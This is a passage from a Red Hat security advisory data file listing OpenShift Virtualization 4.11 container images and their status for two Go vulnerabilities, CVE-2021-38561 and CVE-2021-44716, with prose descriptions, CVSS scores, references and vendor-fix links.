"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2100495", }, ], notes: [ { category: "description", text: "A flaw was found in golang. The language package for go language can panic due to an out-of-bounds read when an incorrectly formatted language tag is being parsed. This flaw allows an attacker to cause applications using this package to parse untrusted input data to crash, leading to a denial of service of the affected component.", title: "Vulnerability description", }, { category: "summary", text: "golang: out-of-bounds read in golang.org/x/text/language leads to DoS", title: "Vulnerability summary", }, { category: "other", text: "This flaw may be triggered only by accepting untrusted user input to the vulnerable golang's library. The overall DoS attack vector depends directly on how the library's input is exposed by the consuming application, thus Red Hat rates impact as Moderate.\n\nIn Red Hat Advanced Cluster Management for Kubernetes (RHACM) 2.5 version, the registration-operator, lighthouse-coredns, lighthouse-agent, gatekeeper-operator, and discovery-operator components are affected by this flaw, but the rest of the components are using an already patched version and are unaffected. For 2.4 and previous versions of Red Hat Advanced Cluster Management for Kubernetes (RHACM), most of the components are affected.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2021-38561", }, { category: "external", summary: "RHBZ#2100495", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100495", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2021-38561", url: "https://www.cve.org/CVERecord?id=CVE-2021-38561", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", url: "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", }, { category: "external", summary: "https://pkg.go.dev/vuln/GO-2021-0113", url: "https://pkg.go.dev/vuln/GO-2021-0113", }, ], release_date: "2021-08-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: out-of-bounds read in golang.org/x/text/language leads to DoS", }, { cve: "CVE-2021-44716", cwe: { id: "CWE-400", name: "Uncontrolled Resource Consumption", }, discovery_date: "2021-12-09T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2030801", }, ], notes: [ { category: "description", text: "There's an uncontrolled resource consumption flaw in golang's net/http library in the canonicalHeader() function. An attacker who submits specially crafted requests to applications linked with net/http's http2 functionality could cause excessive resource consumption that could lead to a denial of service or otherwise impact to system performance and resources.", title: "Vulnerability description", }, { category: "summary", text: "golang: net/http: limit growth of header canonicalization cache", title: "Vulnerability summary", }, { category: "other", text: "For OpenShift Container Platform, OpenShift Virtualization, Red Hat Quay and OpenShift distributed tracing the most an attacker can possibly achieve by exploiting this vulnerability is to crash a container, temporarily impacting availability of one or more services. Therefore impact is rated Moderate.\n\nIn its default configuration, grafana as shipped in Red Hat Enterprise Linux 8 is not affected by this vulnerability. However, enabling http2 in /etc/grafana/grafana.ini explicitly would render grafana affected, therefore grafana has been marked affected.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ 